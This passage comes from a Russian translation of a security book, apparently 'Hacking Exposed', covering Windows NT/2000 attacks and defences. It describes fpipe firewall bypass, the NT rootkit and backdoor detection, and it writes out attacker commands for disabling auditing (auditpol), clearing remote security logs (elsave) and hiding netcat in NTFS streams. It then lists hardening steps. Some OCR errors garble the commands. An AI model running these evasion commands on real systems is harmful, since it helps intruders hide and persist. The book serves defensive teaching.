    Утилита fpipe — средство передачи/перенаправления исходных пакетов TCP через заданный порт. Она разработана в компании Foundstone, Inc., к которой авторы этой книги имеют непосредственное отношение. Утилита fpipe позволяет создать поток TCP и дополнительно задать требуемый исходный порт. Ее удобно применять для тестового проникновения через брандмауэры, разрешающие прохождение определенных типов пакетов во внутреннюю сеть.
    Работа утилиты fpipe основана на перенаправлении портов. Запустите ее, задав прослушиваемый порт сервера, порт назначения удаленного узла (порт, которого требуется достичь с внутренней стороны брандмауэра) и (дополнительно) номер требуемого локального исходного порта. После запуска утилита fpipe будет ожидать, пока клиент соединится с прослушиваемым портом. После этого будут установлено новое соединение с целевым компьютером и портом, заданным в качестве локального исходного порта. Таким образом будет активизирован замкнутый контур. После установки полного соединения утилита fpipe будет передавать все данные, полученные через входящее соединение, на удаленный порт назначения, расположенный позади брандмауэра, и возвращать их обратно системе-инициатору. Это аналогично установке нескольких сеансов netcat, однако утилита fpipe позволяет выполнить ту же задачу абсолютно прозрачно.
    Рассмотрим использование утилиты fpipe для перенаправления данных из взломанной системы с запущенным сервером telnet, расположенной позади брандмауэра, на котором заблокирован порт 23 (telnet), однако открыт порт 53 (DNS), Как правило, подключиться к TCP-порту, используемому сервером telnet, напрямую нельзя. Однако при использовании утилиты fpipe и переправлении данных в порт TCP 53 эту задачу все же можно выполнить. На рис. 5.10 показано перенаправление данных с использованием утилиты fpipe, запущенной на целевом узле.
    Простое соединение с портом 53 на этом узле позволяет "захватить" взломщику поток telnet.



    Рис. 5.10. Утилита перенаправления fpipe, запущенная на удаленном узле

    Самой примечательной особенностью утилиты fpipe является возможность задать исходный порт. В процессе тестового проникновения это зачастую необходимо для обхода брандмауэра или маршрутизатора, передающего лишь данные, предназначенные определенным портам (например, порту TCP 25, используемому почтовым сервером). Обычно клиентским соединениям TCP/IP назначаются исходные порты с большими номерами, которые брандмауэр, как правило, пропускает через фильтр. Однако тот же брандмауэр должен пропускать данные DNS (фактически, он это и делает). С помощью утилиты fpipe для потока данных можно принудительно задать определенный исходный порт, в данном случае порт DNS. С этого момента этот поток будет рассматриваться брандмауэром как данные "разрешенной" службы и, таким образом, будет пропускаться во внутреннюю сеть.

    Пользователи должны знать, что если при задании порта-источника исходящего соединения был использован параметр -в и это соединение было закрыто, может оказаться невозможным установить его повторно (утилита fpipe сообщит, что адрес уже используется) до того момента, пока не истекут интервалы ожидания TIMEJHAIT и CLOSEJHAIT, определяемые протоколом TCP. Эти интервалы ожидания могут варьироваться в диапазоне от 30 секунд до четырех минут и более, в зависимости от используемой операционной системы и ее версии. Эти интервалы ожидания определяются протоколом TCP и не являются ограничением самой утилиты fpipe. Причина возникновения такой ситуации заключается в том, что утилита fpipe пытается установить новое соединение с удаленным узлом с применением тех же комбинаций локальных/удаленных адреса/порта IP, что и в предыдущем сеансе. Новое же соединение не может быть установлено до тех пор, пока стеком протоколов TCP не будет решено, что предыдущее соединение не было полностью завершено.


    23.gif

    Изображение: 

    24.gif

    Изображение: 

    12. Основные контрмеры против атак, направленных на расширение привилегий



    Основные контрмеры против атак, направленных на расширение привилегий


    Как же избавиться от всех программ, установленных в ходе изучения вами данной главы, и "залатать" все оставшиеся "дыры" в защите? Поскольку многие из них были созданы с доступом на уровне администратора, что позволяет использовать все аспекты архитектуры NT, а большинство нужных нам файлов могли быть переименованы и (или) настроены десятками различных способов, эта задача довольно нетривиальна. Мы предлагаем следующие решения общего характера, затрагивающие четыре основные области, к которым так или иначе относятся описываемые в данной главе вопросы: имена файлов, параметры системного реестра, процессы и порты.

    Для ознакомления с некоторыми дополнительными контрмерами против описанных атак мы настоятельно рекомендуем прочитать о "потайных ходах" в главе 14.

    Если взломщику удалось получить привилегии администратора, то лучшим выходом из ситуации является полная переустановка системного программного обеспечения с использованием проверенных носителей. Искушенный взломщик может настолько хорошо скрыть определенные "потайные ходы", что их не удастся обнаружить даже опытным исследователям. Этот совет дан в основном для создания полноты картины. Его не рекомендуется применять при организации подобных атак.

    Имена файлов



    Контрмеры, построенные на использовании имен файлов, по всей видимости, наименее эффективны, поскольку любой мало-мальски соображающий взломщик либо переименует файлы, либо предпримет другие меры, чтобы скрыть их (см. ниже раздел "Сокрытие следов"). Тем не менее, обезопасив себя в этом отношении, вы сможете еще на "дальних подступах" обнаружить хотя бы наименее изобретательных взломщиков.
    Мы уже перечисляли имена файлов, на которые необходимо обратить внимание в первую очередь: remote.exe, пс.exe (netcat), rinetd.exe, NBSvr.exe и patch.exe (серверы NetBus), WinVNC.exe, VNCHooks.dll и omnithread_rt.dll. Если вы обнаружите, что данные файлы появились на сервере без вашего ведома, тут же начните расследование — по "горячим следам" легче установить, кто и зачем это сделал.
    Кроме того, будьте очень внимательны к любым файлам, которые находятся в разных каталогах вида Start Menu\PROGRAMS\STARTUP\%username% (расположенных в каталоге %SYSTEMROOT%\PROFILES). Все программы, помещенные в такие папки, будут автоматически запускаться в процессе загрузки (позднее мы еще вернемся к этому вопросу).
    Хорошей превентивной мерой, позволяющей идентифицировать изменения файловой системы, является использование средств подсчета контрольных сумм, подобных тем, которым посвящен раздел "Набор Rootkit — Полный Взлом Системы" ниже в этой главе.

    Параметры системного реестра



    В отличие от утомительного поиска файлов с определенными именами в надежде, что они не были изменены, поиск параметров системного реестра может оказаться особенно эффективным, поскольку большинство из рассмотренных программ помешает строго определенные параметры в строго определенные места системного реестра. Хорошим местом для начала поиска являются группы параметров HKLM\SOFTWARE и HKEY_USERS\ .DEFAULT\Software, в которых большинство устанавливаемых приложений помещают свои параметры. В частности, утилиты NetBus Pro и WinVNC сохраняют свои параметры следующим образом.

    •  HKEY_USERS\.DEFAULTASoftware\ORL\WinVNC3
    •  HKEY_LOCAL_MACHINE\SOFTWARE\NetSolutions\NetBus Server

    С помощью утилиты командной строки REG.EXE, входящей в состав NTRK, удалить данные параметры из реестра довольно просто, в том числе и на удаленных компьютерах. При этом используется следующий синтаксис.
    reg delete [параметр] \\компьютер
    Например: С:\>reg delete HKEY_USERS\.DEFAULT\Sofware\ORL\WinVNC3 \\192.168.202.33

    Параметры системного реестра, управляющие запуском программ в процессе загрузки



    Основываясь на своем опыте, можем отметить, что практически все взломщики помещают параметры своих программ в стандартную группу параметров системного реестра, управляющих запуском приложений при загрузке Windows. Поэтому на предмет наличия вредоносных или подозрительных параметров нужно регулярно проверять соответствующие области системного реестра, перечисленные ниже.

    •  HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, а также RunOnce, RunOnceEx, RunServices.

    Кроме того, необходимо как можно жестче ограничить доступ пользователей к этим группам параметров. По умолчанию группа EVERYONE имеет разрешения Set value к группе параметров HKLM\ . . \. . \Run. Для того чтобы отменить эти привилегии, воспользуйтесь командой Security>Permissions в редакторе системного реестра regedt32.
    Рассмотрим небольшой пример. На приведенном ниже рисунке показано окно редактора системного реестра, в котором отображается информация о программе netcat, запускающейся при каждой загрузке Windows (группа параметров HKLM\ . . \ . . \Run) для прослушивания порта 8080.


    В данном случае взломщик в любой момент может скрытно подключиться к системе, по крайней мере до тех пор, пока администратор, взявшись за ум, не проверит системный реестр и не удалит из него соответствующий параметр.
    Кроме того, не забудьте проверить также каталоги %systemroot%\profiles\ %sername%\Start Menu\programs\startupV Любые помещенные в них исполняемые файлы будут автоматически запускаться при каждой загрузке!

    Процессы



    Для обнаружения тех хакерских инструментов, которые нельзя переименовать или скрыть каким-либо другим способом, можно проанализировать список выполняющихся на компьютере процессов. Например, с помощью команды AT можно запланировать задание, которое просматривает список процессов и удаляет из него такие обнаруженные процессы, как remote.exe или пс.ехе. Поскольку для использования сервера remote в системном администрировании нет особых причин (особенно, если учесть, что эта утилита не выполняет аутентификации), то для периодического удаления ее из списка процессов можно использовать команду kill.exe из набора NTRK. В следующем примере показано, как с помощью команды AT запланировать задание, которое будет выполняться каждый день в шесть часов утра и удалять процесс remote. Это немного грубо, но зато эффективно — вам остается лишь настроить время запуска в соответствии со своими предпочтениями.

    C:\>at 6А /е:1
    ""kill remote.exe""

    Added a new job with job ID = 12
    C:\>at Status ID Day Time Command Line
    12 Each 1 6:00 AM kill remote.exe
    C:\>kill remote.exe
    process #236 [remote.exe] killed

    Для этих же целей можно использовать утилиту rkill.exe из набора NTRK. Она отличается от kill. exe тем, что может выполняться на удаленном компьютере, а также тем, что в отличие от утилиты kill.exe, нуждается в предоставлении ей в качестве параметра идентификатора удаляемого процесса (PID — Process ID). PID процесса удаленного компьютера можно получить с помощью утилиты pulist.exe, которая также входит в состав NTRK. Можно создать целую автоматизированную систему, в которой регулярно запускается утилита pulist и собирает информацию о выполняющихся на узлах сети запрещенных процессах с последующей передачей этой информации rkill. Конечно, еще раз нужно оговориться, что такую систему очень легко обойти, присвоив выполняемому файлу remote.exe какое-нибудь другое, не вызывающее подозрений имя, например WINLOG.EXE. Однако она сможет эффективно противостоять процессам, которые нельзя переименовывать, например winVNC. EXE.

    Порты



    Даже если такие утилиты, как remote или пс, были переименованы, утилита netstat поможет выявить их присутствие по наличию портов, находящихся в состоянии ожидания или соединения. Периодический запуск netstat с целью проверки подобных соединений — это иногда наилучший способ найти их. В следующем примере показано, как утилита netstat, запущенная на целевом сервере в то время, когда взломщик подключился к нему с помощью утилит remote, nc и установил соединение с портом 8080, отображает результаты опроса портов (описание параметра -an можно узнать, введя в командной строке команду netstat /?). Обратите внимание, что в соединении remote используется порт TCP 139, а утилита netcat находится в состоянии ожидания и имеет одно установленное соединение с портом TCP 8080 (остальные данные, отображаемые netstat, удалены для наглядности).

    С:\> netstat -an
    Active Connections
    Proto Local Address Foreign Address State
    TCP 192.168.202.44:139 0.0.0.0:0 LISTENING
    TCP 192.168.202.44:139 192.168.202.37:1817 ESTABLISHED
    TCP 192.168.202.44:8080 0.0.0.0:0 LISTENING
    TCP 192.168.202.44:8080 192.168.202.37:1784 ESTABLISHED

    Из приведенного фрагмента листинга команды netstat видно, что наилучшей защитой против использования утилиты remote является блокирование доступа к портам 135-139 потенциальных целей или на уровне брандмауэра либо отключение привязки NetBIOS для незащищенных адаптеров, как описывалось в разделе "Контрмеры: Защита От Подбора Пароля" выше в данной главе.
    С помощью конвейера, организованного между командами netstat и find, можно получить данные об определенных портах. Так, с помощью следующей команды выполняется поиск серверов NetBus, прослушивающих порт по умолчанию, netstat -an| find "12345"
    Утилита fport от компании Foundstone (http://www.foundstone.com) позволяет получить комбинированную информацию о процессах и портах. Она предоставляет перечень всех активных сокетов и идентификаторов процессов, использующих соединение. Вот пример ее результатов.

    FPORT - Process port mapper
    Copyright (с) 2000, Foundstone, Inc.
    http://www.foundstone.com
    PID NAME TYPE PORT
    184 IEXPLORE UDP 1118
    249 OUTLOOK UDP 0
    265 MAPISP32 UDP 1104
    265 MAPISP32 UDP 0


    25.gif

    Изображение: 

    13. Набор Rootkit — полный взлом системы



    Набор Rootkit — полный взлом системы


    А что, если даже сам код операционной системы окажется под контролем взломщика? Эта идея достаточно хорошо опробована для платформы UNIX. Закономерно, что для замены стандартных исполняемых файлов "троянскими конями" обычно требуется получить учетную запись root системы UNIX на целевом компьютере. Наборы программ, выполняющих эту операцию, получили название "отмычек". "Отмычки", применяемые в UNIX, подробно рассматриваются в главе 8, а обсуждение "отмычек" вообще можно найти в главе 14.

    Отмычки" NT/2000



    Нет ничего удивительного в том, что в 1999 году благодаря группе Грега Хогланда (Greg Hogland, http://www.rootkit.com) система Windows NT/2000 "приобрела" свой собственный набор "отмычек". Грег застал врасплох сообщество Windows, продемонстрировав рабочий прототип таких инструментов, который способен выполнять сокрытие параметров системного реестра и "подмену" исполняемых файлов. Этот набор можно использовать в исполняемых файлах "троянских коней" без изменения их содержимого. Все эти трюки основываются на использовании перехвата функций (function hooking). Таким образом можно "модифицировать" ядро NT, в результате чего будут захвачены системные вызовы. С помощью набора "отмычек" можно скрыть процесс, параметр системного реестра или файл, а также перенаправить перехваченный вызов функциям "троянских коней". Полученный результат способен превзойти ожидания от внедрения "троянских коней": пользователь не может быть уверен даже в целостности исполняемого кода.
    В момент написания этой книги набор "отмычек" систем NT/2000 по-прежнему оставался на стадии альфа-версии и в основном предназначался для демонстрации наиболее важных особенностей, а не для реального применения. Распространяемый комплект состоит из двух файлов: _root_.sys и deploy.exe. При запуске файла deploy.exe набор "отмычек" будет установлен и запущен.
    После установки активизируется режим сокрытия параметров системного реестра. Любой параметр или значение, начинающиеся с шести символов _root_, будут скрыты для просмотра с помощью любого из редакторов regedit.exe или regedt32.exe. Любой исполняемый файл, имя которого будет начинаться с _root_, не будет виден. С помощью копии редактора системного реестра regedit.exe, переименованной в файл _root_regedit.exe, можно просмотреть все скрытые параметры. Тем самым взломщику предоставляется прекрасный "потайной ход", с использованием которого можно приступить к ручной работе без отключения режима маскирования "набора отмычек".
    В альфа-версии средство перенаправления исполняемых файлов позволяет выявлять выполнение файлов с именами, начинающимися с _root_, и перенаправлять их результаты файлу С: \calc.exe (жестко заданный режим, не позволяющий взломщику немедленно получить долгожданную информацию, однако наглядно демонстрирующий его потенциальную злонамеренность).
    Грег также распространяет консоль удаленного управления RogueX из набора "отмычек" с изящным интерфейсом. Она находится на стадии разработки и имеет ограниченные функциональные возможности (в частности, позволяет инициировать сканирование портов удаленного узла, на котором установлен набор "отмычек").

    Контрмеры: защита от набора "отмычек"



    Если вы не можете доверять даже команде dir, значит, пришло время признать себя побежденным: создайте резервную копию важных данных (кроме двоичных файлов!), удалите все программное обеспечение и переустановите его с проверенных носителей. На полагайтесь на резервные копии, поскольку неизвестно, в какой момент взломщик получил контроль над системой, — вы можете восстановить тех же самых "троянских коней".
    Сейчас важно подчеркнуть одно из золотых правил обеспечения безопасности и восстановления после сбоев: известные состояния (known states) и повторяемость (repeatability). Производственные системы зачастую должны быть быстро переустановлены, так что хорошо документированная и достаточно автоматизированная процедура установки позволит сэкономить много времени. Наличие проверенных носителей, готовых для выполнения процедуры восстановления, также достаточно важно. Если под рукой имеется компакт-диск с полностью сконфигурированным образом Web-сервера, то выигрыш во времени окажется еще более значительным. Другим хорошим приемом является документирование процесса настройки производственного режима эксплуатации, а не промежуточного режима, поскольку в процессе построения системы или ее обслуживания могут появиться изъяны в системе защиты (появления новых совместно используемых ресурсов и т.д.). Убедитесь, что в вашем распоряжении имеется контрольный список или автоматизированный сценарий возврата в производственный режим.
    Подсчет контрольных сумм также оказывается хорошей защитой против использования наборов "отмычек", однако этот прием нужно применять к системе в исходном состоянии (т.е. такой подход представляет собой превентивную меру, которая окажется бесполезной после возникновения неприятностей). Средства, подобные свободно распространяемой утилите MDSsum, способны "снимать" образы файлов и уведомлять о нарушении их целостности при возникновении изменений. Для системы Windows двоичный код утилиты MDSsum можно найти по адресу http: //sourceware.cygnus.com/cygwin/. С ее помощью для файла можно вычислить или проверить профильное сообщение (message digest) длиной 128 бит. При этом применяется популярный алгоритм MD5 Рона Райвеста (Ron Rivest) из лаборатории MIT Laboratory for Computer Science and RSA Security. Этот алгоритм описан в документе RFC 1321. В следующем примере утилита MDSsum показана в работе в процессе генерации контрольной суммы для файла с последующей ее проверкой.

    D:\Toolbox>md5sum d:\test.txt > d:\test.md5
    D:\Toolbox>cat d:\test.md5
    efd3907b04b037774d831596f2clbl4a d:\Xtest.txt
    D:\Toolbox>md5sum —check d:\test.md5
    d:\Xtest.txt: OK

    К сожалению, утилита MDSsum одновременно работает лишь с одним файлом (конечно, использование сценариев несколько смягчает это неудобство).
    К более эффективным средствам выявления вторжений в файловую систему относится хорошо известная утилита Tripwire, которую можно найти по адресу http://www.tripwire.com. С ее помощью можно выполнить аналогичный подсчет контрольных сумм для широкого диапазона систем.

    Перенаправление исполняемых файлов, выполняемое набором "отмычек" системы NT/2000, теоретически может нейтрализовать подсчет контрольных сумм. Однако поскольку код при этом не изменяется, но в то же время "захватывается" и передается через другую программу, то такой прецедент все же можно выявить.

    Необходимо упомянуть еще несколько важных утилит, предназначенных для проверки содержимого двоичных файлов. К ним относится старая утилита UNIX strings, перенесенная на платформу Windows (также разработана компанией Cygnus), BinText от Робина Кейра  и мощный редактор текста/ шестнадцатеричных данных UltraEdit32 для Windows, который можно найти по адресу http: //www.ultraedit.com. Мы считаем, что редактор BinText лучше всего поместить в папку SendTo, так чтобы его можно было активизировать при щелчке правой кнопкой мыши на имени файлов в проводнике Windows. Для этих же целей редактор UltraEdit32 помещает в контекстное меню соответствующую команду.
    И наконец, относительно набора "отмычек" NT/2000 Греша можно сказать, что наличие файлов deploy.exe и _root_.sys служит явным подтверждением нападения (или как минимум любознательности хозяина компьютера). К счастью, запуск и завершение набора "отмычек" можно выполнить с использованием команды net.

    net start _root_
    net stop _root_

    В Windows 2000 появилось средство защиты файлов операционной системы (Windows File Protection), которое предотвращает перезапись системных файлов, установленных программой инсталляции Windows 2000 (для этого около 600 файлов хранится в папке %systemroot%). В последних сообщениях, появившихся в бюллетене NTBugtraq, содержится информация о том, что систему WFP можно обойти, особенно, если ранее были получены привилегии администратора.


    14. Сокрытие следов



    Сокрытие следов


    Как только злоумышленник получит права администратора, он, скорее всего, постарается скрыть факт своего присутствия в системе. Затем, получив всю интересующую его информацию, он создаст потайные ходы и примет все меры, чтобы спрятать установленные им утилиты. Если с обеими задачами он справится успешно, то подготовка и проведение повторной атаки займет у него гораздо меньше времени.


    15. Отключение аудита



    Отключение аудита


    Если владелец взламываемой системы хоть немного беспокоится о безопасности, он обязательно включит режим аудита, о чем мы уже говорили выше в данной главе. Поскольку ведение журналов может снизить производительность интенсивно работающих серверов, особенно если регистрируются такие события, как, например, успешное выполнение функций управления пользователями и группами (флажок Success для события User and Group Management в диалоговом окне Audit Policy диспетчера пользователей), многие администраторы NT либо вообще не включают функций контроля, либо включают лишь некоторые из них. Однако первое, что делает злоумышленник, пытаясь получить привилегии администратора, проверяет, активизирован ли режим аудита, чтобы случайно не "засветиться". Утилита auditpol из набора NTRK позволяет управлять этим процессом. В следующем примере показано, как с помощью утилиты auditpol отключается режим аудита на удаленном компьютере.

    С:\> auditpol /disable
    Running ...
    Local audit information changed successfully ...
    New local audit policy . . .
    (0) Audit Disabled
    AuditCategorySystem = No
    AuditCategoryLogon = Failure
    AuditCategoryObjectAccess = No

    Закончив работу, взломщик может снова включить режим аудита с помощью команды auditpol /enable.


    16. Очистка журнала регистрации событий



    Очистка журнала регистрации событий


    Если деятельность, связанная с получением статуса администратора, оставила красноречивые следы в журнале регистрации событий системы NT, с помощью приложения просмотра событий взломщик может просто стереть все записи журнала. Для этого злоумышленнику достаточно запустить приложение Event Viewer на своем компьютере и подключиться к узлу, к которому он получил доступ. После выполнения аутентификации взломщик может открывать, читать и очищать журналы регистрации событий удаленного узла. При удалении уничтожаются все записи, кроме одной, которая сообщает о том, что журнал регистрации был очищен посторонним. Конечно, даже такого сообщения вполне достаточно, чтобы забить тревогу, но, к сожалению, в распоряжении злоумышленника имеются и другие способы. Например, он может найти файлы журналов в каталоге \winnt\system32 и отредактировать их вручную, хотя это не так-то просто, учитывая сложность синтаксиса журналов NT.
    Одним из средств, значительно упрощающих эту задачу, является утилита Джеспера Лорицена (Jesper Lauritsen). Например, следующая команда обеспечит очистку журнала безопасности на удаленном сервере joel (подразумевается, что необходимый уровень привилегий имеется). C:\>elsave -s \\joel -1 "Security" -С


    17. Скрытие файлов



    Скрытие файлов


    Если злоумышленнику удастся сохранить на взломанной системе установленные им программы, это значительно облегчит его задачу при повторном проникновении. Но, с другой стороны, именно по наличию неизвестно откуда взявшихся программ системный администратор может судить о том, что компьютер был взломан. Таким образом, злоумышленнику нужно предпринять какие-то шаги, чтобы как можно лучше скрыть файлы, которые потребуется запустить при последующих атаках.

    attrib



    Самый простой способ сокрытия файлов состоит в том, чтобы после их копирования в выбранный каталог воспользоваться старой командой DOS attrib, как показано в следующем примере.
    attrib +h [каталог]
    После использования такой команды при просмотре содержимого каталога из командной строки все файлы и каталоги окажутся скрытыми. Однако эта команда окажется бесполезной, если в проводнике Windows установлен режим Show All Files.

    Использование потоков в файлахМТРЗ



    Если на целевом узле используется файловая система NTFS, то для сокрытия файлов взломщик может воспользоваться еще одним приемом. Дело в том, что система NTFS поддерживает несколько потоков (stream) информации внутри файла. Система поддержки потоков в NTFS трактуется компанией Microsoft как "механизм добавления дополнительных атрибутов или информации к файлу без реструктуризации файловой системы". Например, потоки используются при включенном режиме совместимости NTFS с файловой системой Macintosh. Однако к этому же механизму можно прибегнуть и для сокрытия в потоках набора инструментов, установленных хакером.
    В следующем примере показано, как исполняемый файл утилиты netcat помещается в поток, присоединенный к файлу oso00l.009, находящемуся в каталоге winnt\system32\os2. Впоследствии этот файл может быть извлечен для взлома других удаленных систем. Этот файл был выбран из-за того, что он вряд ли вызовет подозрения, но вместо него можно использовать любой другой файл.
    Для того чтобы создать файловый поток, нужно иметь в своем распоряжении утилиту ср из набора NTRK, поддерживающую стандарт POSIX. Синтаксис ее использования прост. Через двоеточие, помещенное после имени файла-контейнера нужно указать имя записываемого в поток файла,
     ср <файл> oso00l.009:<файл>
    Например, 
    ср nc.exe oso00l.009:nс.ехе
    Данная команда помещает файл nc.exe в поток nc.exe файла oso00l. 009. Для того чтобы извлечь утилиту netcat из потока, необходимо воспользоваться следующей командой, ср oso00l.009:nc.exe nc.exe
    При этом изменится дата модификации файла oso00l. 009, но его размер останется прежним (некоторые версии утилиты ср не изменяют даты). Таким образом, скрытые файлы, объединенные с помощью механизма потоков с обычными файлами операционной системы, очень трудно обнаружить.
    Для удаления файла, находящегося в потоке, необходимо скопировать файл-носитель на диск, отформатированный в системе FAT, а затем скопировать его обратно на диск с файловой системой NTFS.
    Файл с несколькими потоками по-прежнему можно запустить на выполнение. Правда, из-за ограничений командного интерпретатора cmd. exe этого нельзя сделать непосредственно, т.е. введя имя файла в командной строке (например, oso00l. 009: nс. ехе), но зато можно воспользоваться командой START, как показано в следующем примере, start oso00l.009:nс.ехе

    Контрмеры: поиск потоков



    Единственным надежным средством, с помощью которого можно обнаружить потоки в файлах NTFS, является утилита Streamfinder компании March Information Systems. Недавно ее приобрела компания Internet Security Systems (ISS), которая, по всей видимости, больше не будет распространять эту утилиту через европейский Web-узел. Копию утилиты Streamfinder можно получить по адресу http://www.hackingexposed.com. Еще одним хорошим средством выявления файловых потоков является утилита sf ind Ди-джея Гласера (JD Glaser).


    18. Резюме



    Резюме



    В этой главе мы рассмотрели настолько широкий спектр возможных атак Windows NT, что у многих читателей может сложиться ошибочное представление о недостаточно надежной системе защиты этой операционной системы. Если это так, значит, мы не справились со стоявшими перед нами задачами. В таком случае хотелось бы еще раз подчеркнуть, что удаленный взлом практически не имеет шансов на успех без привилегий администратора, а получить эти привилегии можно лишь некоторыми хорошо известными способами: путем подбора пароля, его перехвата из сетевого потока данных или с использованием методов социальной инженерии, примененных к доверчивым служащим.
    Поэтому по сравнению с объемом самой главы наши выводы будут относительно короткими. Если вы предпримете следующие простые меры, то 99,99% проблем, связанных с обеспечением безопасности системы NT, исчезнут сами собой. Однако не забывайте об оставшейся 0,01%, о которой вы, скорее всего, пока еще ничего не знаете.

    •  Заблокируйте порты TCP и UDP с номерами 135-139. Этого простого шага уже достаточно, чтобы предотвратить практически все проблемы, связанные с удаленным взломом NT, который рассматривается на страницах этой книга. Эта защитная мера должна быть обязательно предпринята на пограничном шлюзе, защищающем всю сеть. Ее также не помешает использовать и на внутренних устройствах управления доступом. На отдельных узлах, содержащих важные данные, можно также запретить поддержку протокола NetBIOS. Заблокировав порты, не забывайте регулярно сканировать свою сеть, чтобы вовремя обнаружить различные отклонения.
    •  Если ваша сеть NT работает на базе протокола TCP/IP, настройте фильтрацию пакетов TCP/IP в соответствующем диалоговом окне свойств (Control Panel>Network>Protocols>TCP/IP Protocol>Advanced). Установите в нем флажок Enable Security, а затем щелкните на кнопке Configure и настройте параметры фильтрации. Используйте только те порты и протоколы, которые жизненно' необходимы для функционирования системы (хотя передача ICMP-пакетов практически всегда должна быть разрешена).
    •  Задайте значение для параметра RestrictAnonymous системного реестра, как об этом было сказано в главе 3. Кроме того, в статье Q246261 базы знаний компании Microsoft прочитайте о возможных недостатках задания значения для этого параметра, обеспечивающего наиболее жесткий уровень зашиты в системе Win 2000.
    •  Удалите Everyone из списка групп, которым предоставлено право Access this computer from the network. Для этого в окне диспетчера пользователей выберите команду Policies>User Rights.
    •  Установите самый свежий сервисный пакет Service Pack и дополнительные модули обновлений. В процессе выпуска обновлений компания Microsoft руководствуется требованиями обеспечения безопасности, поэтому очень часто оказывается, что без этих модулей обновлений невозможно противостоять некоторым изъянам на уровне ядра, используемых в таких утилитах, как getadmin. Модули обновления для системы NT можно найти по адресу http://www.microsoft.com/security. Конечно, самым полным "обновлением" будет переход на новую версию NT — Windows 2000, — в которой реализовано огромное, множество новых средств обеспечения безопасности. Более подробная информация по этому вопросу содержится в главе 6.
    •  Введите жесткую политику задания паролей, реализуйте ее с использованием библиотеки passfilt и регулярно контролируйте соблюдение установленных требований. Да, правильно, — попробуйте взломать собственную базу данных SAM! Помните о числе 7, которое оказывается достаточно "волшебным", когда дело касается длины пароля в системе NT.
    •  Переименуйте учетную запись Administrator и убедитесь в том, что запрещена учетная запись Guest. Хотя вы узнали, что учетную запись администратора можно идентифицировать, даже после ее переименования, тем не менее, эта мера усложнит задачу злоумышленника.
    •  Убедитесь в том, что пароль администратора выбран достаточно сложным (при необходимости используйте специальные символы ASCII). He забывайте регулярно его менять.
    •  Убедитесь в том, что простые администраторы не используют данных учетных записей администраторов домена для регистрации в качестве локальных администраторов.
    •  Установите утилиту passprop из набора NTRK, чтобы обеспечить блокировку учетных записей администраторов и таким образом воспрепятствовать попыткам методичного подбора паролей.
    •  Установите средство расширенного шифрования SYSKEY файла паролей NT (SAM) (Q248183). Это не остановит взломщиков раз и навсегда, но значительно усложнит их работу.
    •  Включите режим аудита и регистрируйте неудачные попытки выполнения важных системных функций, таких как Logon and Logoff, а также тех, которые оказываются важными при реализации политики безопасности, принятой в вашей организации. Проверяйте файлы журналов еженедельно или же применяйте средства их автоматического анализа.
    •  Убедитесь в том, что доступ к системному' реестру надежно защищен, особенно посредством удаленного доступа, с помощью параметра HKEY_LOCAL_MACHINE\-SYSTEM\ CurrentControlSet\Control\SecurePipeServers\ winreg\AllowedPath.
    •  С помощью системного реестра сделайте компьютер, на котором хранится важная информация, невидимым в сети, установив для этого параметр HKLM\SYSTEM\CurrentControlSet\Services\LanManServer\ Parameters\Hidden, REG_DWORD=1. При этом узел будет удален из всех списков, создаваемых в окне просмотра сети (Network Neighborhood), но при этом он будет по-прежнему будет обмениваться информацией с другими компьютерами.
    •  Не запускайте ненужных служб, а также избегайте использования тех служб, которые запускаются в контексте пользовательской учетной записи.
    •  Выясните, как запускать используемые вами приложения с максимальной степенью безопасности, а если это невозможно, то не запускайте их совсем. Обязательно прочитайте документ Microsoft Internet Information Server 4.0 Security Checklist, который находится по адресу http://www.microsoft.com/technet
      /security/tools.asp
      . В нем собрано очень много ценных советов о защите NT. Вопросы безопасности сервера баз данных SQL 7.0 подробно рассматриваются по адресу http://www.microsoft.com/technet/
      SQL/Technote/secure.asp
      .
    •  Расскажите пользователям о важности паролей и объясните им основные принципы использования учетных записей, чтобы они не попадались на такие трюки, как получение хэш-кодов путем отправки электронного письма-"приманки".
    •  Перейдите на сеть с коммутируемой архитектурой, чтобы в максимальной степени усложнить перехват пакетов, передаваемых в процессе обмена данными по сети (однако это не обеспечит абсолютной безопасности!).
    •  Следите за сообщениями, появляющимися в бюллетенях (Bugtraq — http://www.securityfocus.com/ и NTBugtraq — http://www.ntgugtraq.com/), а также регулярно посещайте собственный Web-узел компании Microsoft, посвященный вопросам обеспечения безопасности, расположенный по адресу http://www. microsoft.com/security.


    Глава 6. Уязвимость Windows 2000



    Глава 6. УЯЗВИМОСТЬ WINDOWS 2000




    1. Уязвимость Windows 2000



    Уязвимость WINDOWS 2000


    Осенью 1999 года компания Microsoft открыла доступ через Internet к нескольким тестовым серверам с бета-версией операционной системы Windows 2000 Server на узле Windows2000test.com, предлагая всем желающим попытаться взломать этот программный продукт.
    Несколько недель спустя, после многочисленных успешных атак со стороны хакеров, этот эксперимент был отменен. Правда, следует отметить, что хакерам не удалось достичь уровня операционной системы. Они лишь обнаружили бреши в приложении Guestbook, основанном на использовании Web-технологии и работающем "на переднем крае" операционной системы. Аналогичные результаты были получены в процессе проведения других подобных тестов.
    Такие тесты включают множество параметров, и мы не станем обсуждать их реальные возможности по выявлению преимуществ системы безопасности Windows 2000 по сравнению с конкурирующими программными продуктами. Однако в результате такого тестирования совершенно очевидно одно: правильно сконфигурированные серверы под управлением Windows 2000 на уровне операционной системы столь же надежны, как любые другие серверные платформы. Наиболее уязвимым местом этой операционной системы является уровень приложений, посредством которого можно обойти системные средства обеспечения безопасности.
    Защищенность Windows 2000 подкреплена множеством новых средств обеспечения безопасности, встроенных в операционные системы Windows нового поколения. К ним относятся реализация собственного протокола IP Security (IPSec), кодирующая файловая система EPS (Encrypting File System), возможность выбора политики безопасности для групп пользователей, шаблоны защиты Security Templates, средство конфигурирования и анализа политики безопасности, а также возможность централизованного удаленного управления на основе использования сервера удаленной аутентификации RADIUS (Remote Authentication Dial-In User Service) и многое другое. При этом бросается в глаза соответствие всех средств обеспечения безопасности общепризнанным стандартам, что свидетельствует об изменении общеизвестной сепаратистской политики компании Microsoft в вопросах обеспечения безопасности.
    Перечисленные технологии обеспечили пользователям NT долгожданные возможности, но достаточно ли корректно они реализованы? Радикальные изменения в Windows 2000, особенно касающиеся нового средства Active Directory (AD), заставят сетевых администраторов изрядно потрудиться при переходе на новую операционную систему. И как показывает опыт, из-за неполной реализации протоколов и проблем совместимости с более ранними версиями говорить о полной безопасности операционной системы можно будет лишь после появления сервисного пакета Service Pack 3.
